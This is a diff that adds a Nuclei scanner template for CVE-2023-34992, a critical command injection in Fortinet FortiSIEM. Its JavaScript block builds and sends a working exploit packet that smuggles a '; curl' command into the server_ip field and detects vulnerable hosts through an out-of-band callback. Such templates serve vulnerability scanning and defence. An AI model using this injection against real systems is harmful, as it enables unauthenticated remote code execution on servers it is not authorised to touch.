Create CVE-2023-34992.yaml

javascript/cves/2023/CVE-2023-34992.yaml

@@ -0,0 +1,56 @@
+id: CVE-2023-34992
+
+info:
+  name: Fortinet FortiSIEM - Remote Code Execution
+  author: pussycat0x
+  severity: critical
+  description: |
+    A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.0.0 and 6.7.0 through 6.7.5 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.1 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via crafted API requests.
+  reference:
+    - https://github.com/horizon3ai/CVE-2023-34992/blob/main/CVE-2023-34992.py
+    - https://www.horizon3.ai/attack-research/disclosures/cve-2023-34992-fortinet-fortisiem-command-injection-deep-dive/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-34992
+    cwe-id: CWE-78
+    epss-score: 0.00078
+    epss-percentile: 0.33761
+    cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: fortinet
+    product: fortisiem
+  tags: cve,cve2023,fortinet
+
+javascript:
+  - pre-condition: |
+      isPortOpen(Host,Port);
+    code: |
+      const packet = bytes.NewBuffer();
+      const py1 = `<TEST_STORAGE type="nfs">
+      <server_ip>127.0.0.1; curl`
+      const py2 = `;</server_ip>
+      <mount_point>/test</mount_point>
+      </TEST_STORAGE>`
+      const payload = py1+url+py2
+      console.log(payload)
+      const payloadLength = payload.length;
+      payloadLength;
+      packet.Pack("<I", [81]);
+      packet.Pack("<I", [payloadLength]);
+      packet.Pack("<I", [1075724911]);
+      packet.Pack("<I", [0]);
+      const c = require("nuclei/net");
+      let conn = c.OpenTLS('tcp', `${Host}:${Port}`);
+      conn.SendHex(packet.Hex());
+      conn.RecvString();
+
+    args:
+      Host: "{{Host}}"
+      Port: 11211
+      url: "http://{{interactsh-url}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(interactsh_protocol, "http")'